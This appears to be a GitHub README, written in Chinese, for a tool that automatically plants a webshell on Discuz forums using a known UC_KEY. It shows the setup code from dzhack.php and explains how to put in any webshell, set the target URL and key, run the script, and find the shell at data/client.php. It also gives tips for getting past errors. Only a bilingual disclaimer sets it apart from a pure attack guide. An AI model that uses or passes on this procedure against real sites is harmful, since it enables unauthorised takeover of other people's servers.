losiry / discuz-getshell-auto-method2 Goto Github PK

本方法比写 config_ucenter.php 更加稳定，而且不易出错

打开 dzhack.php, 找到

$webshell = '<?php phpinfo(); ?>';
 
list ($status, $data) = $dz->hack (
   'http://ubuntu64/dz/',
   'K856C548X2xaTcDdc248I1pc57gdq4vdL2SdH3ifGd4a0ec6UdcfX0B7m9Ubrcs4',
   ...
);

先把第一行 $webshell 的内容改了，不需要考虑编码问题，

然后修改 hack 函数的参数，第一个为 discuz 的起始路径，第二行为你找到的 UC_KEY

然后执行 php dzhack.php,

会在 data/client.php 下面生成一个 webshell,

![Screenshot] (https://raw.githubusercontent.com/CaledoniaProject/discuz-getshell-auto-method2/master/contrib/screenshot.png "Desktop screenshot")

觉得方便的话，可以顺便把参数改成 argv[1] 和 argv[2]

1. 新版 Dz 防御了 XSS，所以没法 POST XML
2. 提示 Authentication Expired （DZ 拼错了），多试几次就好了，因为服务器时钟不一致导致的

Using this tool is legit but hacking may not be. The author does not take any responsibility for such activities.

这个工具是合法的，然而攻击他人服务器并不是合法的，作者对此不承担任何责任